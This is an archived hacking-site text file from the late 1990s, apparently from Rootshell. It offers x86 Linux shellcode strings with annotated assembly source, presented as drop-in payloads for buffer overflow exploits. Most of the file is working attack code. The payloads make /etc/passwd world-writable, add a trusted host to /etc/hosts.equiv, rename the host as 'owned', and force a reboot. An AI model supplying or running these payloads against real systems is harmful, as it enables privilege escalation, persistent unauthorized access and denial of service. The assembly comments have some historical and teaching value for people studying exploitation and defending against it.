Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Discontinued :: asmcodes.txt

Assembly drop in replacements for your favorite exploits. (x86 only)





[ http://www.rootshell.com/ ]

-----------------[ begin asmcodes.txt ]---------------------

-- Assembly drop in replacements --
(Probably useless, but can be a little fun ;-) )

Here are some assembly instructions that you can drop into your favorite
buffer overflow exploit. Generally, replacing existing shellcodes in
existing buffer overruns with one these is all you need to do. Feel free to
modify and experiment with these.  (Sorry about the null's in them before
;-) )

/* This one changes the mode on /etc/passwd to 777 */
char shellcode[]=
  "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x1d"
  "\x01\xfb\x30\xc0\x88\x43\x0b\x31\xc9\x66\xb9\xff\x01\x31\xc0\xb0"
  "\x0f\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f\x65\x74\x63\x2f\x70\x61"
  "\x73\x73\x77\x64\x89\xec\x5d\xc3";

/* This one creates /etc/hosts.equiv with a host called b00ger */
char shellcode[]=
  "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35"
  "\x01\xfb\x31\xc0\x88\x43\x10\x31\xc9\x66\xb9\x41\x04\x31\xd2\x66\xba"
  "\xa4\x01\x31\xc0\xb0\x05\xcd\x80\x89\xc3\x31\xc9\xb1\x46\x01\xf9\x31" 
  "\xd2\xb2\x07\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f\x65"
  "\x74\x63\x2f\x68\x6f\x73\x74\x73\x2e\x65\x71\x75\x69\x76\x01\x62\x30"
  "\x30\x67\x65\x72\x0a\x89\xec\x5d\xc3";

/* This one is useless: it just changes the hostname to yEw_r_0wn3d */
char shellcode[]=
   "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff"
   "\x31\xc0\xb0\x4a\x31\xdb\xb3\x16\x01\xfb\x31\xc9\xb1"
   "\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x79\x45\x77\x5f"
   "\x72\x5f\x30\x77\x6e\x33\x64\x89\xec\x5d\xc3";

/* This is also useless: it just reboots an x86 machine */
char shellcode[]=
   "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff"
   "\xff\xff\x31\xc0\xb0\x24\xcd\x80\x31\xc0\xb0"
   "\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28"
   "\xba\x67\x45\x23\x01\xcd\x80\x31\xc0\xb0\x01"
   "\xcd\x80\x89\xec\x5d\xc3";


 -- Source code --

   # changes mode on /etc/passwd to 777 
   # making it writeable by anyone. 

   jmp rootshell
   hey:
      popl %edi
      jmp yo
   rootshell:
      call hey
   yo: 				# yo! w3rD!
		                # chmod() is system call 15 (0xf)
				# (see /usr/include/asm/unistd.h)
				# eax contains syscall number 
      xorl %ebx,%ebx            # ebx has path to file
      movb $(phile-yo),%bl
      addl %edi,%ebx            
      xorb %al,%al 	        # clear out al
      movb %al,11(%ebx)         # length of filename (11)
      xorl %ecx,%ecx            # clear out ecx
      movw $00777,%cx           # ecx contains mode 777
      xorl %eax,%eax            # clear out eax
      movb $0xf,%al             # syscall 15 (0xf) is chown
      int $0x80                 # interrupt (make call)
      xorl %eax,%eax            # clear eax
      movb $0x01,%al            # syscall 1 (0x01) is exit
      int $0x80                 # interrupt (make call)
   phile:
   .ascii \"/etc/passwd\"       # /etc/passwd (11)

-------------------------

   # Creates the file /etc/hosts.equiv if it does
   # not exist (or appends to if it does) and will
   # insert the host:   b00ger
   # changing this should be trivial

   jmp rootshell		 
   coded_by_bmV:                
      popl %edi
   jmp phoo
   rootshell:
      call coded_by_bmV
   phoo: 			# ok. I meant 'foo'
                                # open() is system call 5 
                                # (see /usr/include/asm/unistd.h)
                                # eax contains syscall number
				# ebx will have filename
				# ecx contains open flags
				# edx contains mode of file
				# ->file is handle returned to eax
      xorl %ebx,%ebx 	        # clear ebx
      movb $(file-phoo),%bl     # filename to open in ebx
      addl %edi,%ebx
      xorl %al, %al	        # clear out al
      movb %al,16(%ebx)         # /etc/hosts.equiv (16)
      xorl %ecx,%ecx            # clear out ecx
      movw $0x441,%cx           # O_WRONLY | O_CREAT | O_APPEND
      xorl %edx,%edx	        # clear out edx
      movw $00644,%dx	 	# mode 0644 -rw-r--r--
      xorl %eax,%eax		# clear eax
      movb $0x5,%al 		# syscall 5 (0x5) is open()
      int $0x80			# interrupt (make call)
				# write() is system call 4
				# (see /usr/include/asm/unistd.h)
				# eax contains syscall 4 (write)
				# ebx will have file handle
			  	# ecx will point to "b00ger"
			        # edx is strlen("b00ger");
      movl %eax,%ebx		# move file handle to ebx
      xorl %ecx, %ecx           # clear out ecx
      movb $(string-phoo),%cl   # put "b00ger" in ecx
      addl %edi,%ecx
      xorl %edx,%edx	        # clear edx
      movb $7,%dl		# strlen("b00ger") ==7
      xorl %eax,%eax		# clear out eax
      movb $0x04,%al		# syscall 4 is write()
      int $0x80			# interrupt (make call)
      xorl %eax,%eax		# clean out eax
      movb $0x01,%al		# syscall 1 (0x01) is exit()
      int $0x80			# interrupt (make call)
				# exit() should close file
   file:
   .ascii \"/etc/hosts.equiv\"	
   .byte 1
   string:
   .ascii \"b00ger\n\"

-------------------------

   # written just for grins ;-)
   # code to change to hostname of the
   # target machine to: yEw_r_0wn3d 
   # Yes, I know this is useless :P

  jmp rootshell
  by_bm5:
     popl %edi
     jmp asmcode
  rootshell:
     call by_bm5
  asmcode: 			   # assembly code ?
				   # 74 (0x4a) is sethostname()
			           # (see /usr/include/asm/unistd.h)
				   # eax will have syscall 74
				   # ebx points to "yEw_r_0wn3d"
			           # ecx= strlen("yEw_r_0wn3d")==11
     xorl %eax,%eax		   # clear out eax
     movb $0x4a,%al		   # move 74 (sethostname()) to al
     xorl %ebx,%ebx		   # clear out ebx
     movb $(string-asmcode),%bl    # put yEw_r_0wn3d in ebx
     addl %edi,%ebx
     xorl %ecx,%ecx		   # clear out ecx
     movb $0x0b,%cl	           # strlen("yEw_r_0wn3d")==0xb
     int $0x80		           # interrupt (make call)
     xorl %eax,%eax		   # clear out eax
     movb $0x01,%al                # syscall 1 (0x01) is exit()
     int $0x80			   # interrupt (make call)
  .byte
  string:
  .ascii \"yEw_r_0wn3d\"

-------------------------

  # reboots a Linux x86 box 
  # also quite useless, but 
  # good for learning.

  jmp rootshell	
  coded_by_bmV:
     popl %edi
     jmp reb00t
  rootshell:
     call coded_by_bmV
  reb00t: 			# reboot Linux
				# sync() is syscall 36
				# (see /usr/include/asm/unistd.h)
     xorl %eax,%eax		# clear out eax
     movb $0x24,%eax		# make syscall to sync()
     int $0x80			# interrupt (make call)
				# reboot() is syscall 88 (0x58)
				# (see /usr/include/asm/unistd.h)
				# eax contains syscall 88 (reboot)
				# ebx will contain magic
				# ecx will contain magic2
			        # (see manual page for reboot)
     xorl %eax,%eax		# clear out eax
     movb $0x58,%eax 		# move 88 (reboot()) to eax
     movl $0xfee1dead,%ebx	# put magic into ebx
     movl $672274793,%ecx	# put magic2 into ecx
     movl $0x1234567,%edx 	# put flag into edx
				# read reboot manpage!
     int $0x80			# interrupt (make call)
     xorl %eax,%eax		# clear out eax
     movb $0x01,%al		# syscall 1 (0x01) is exit()
     int $0x80			# interrupt (make call)

-------------------------

		  -->	Have fun!



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH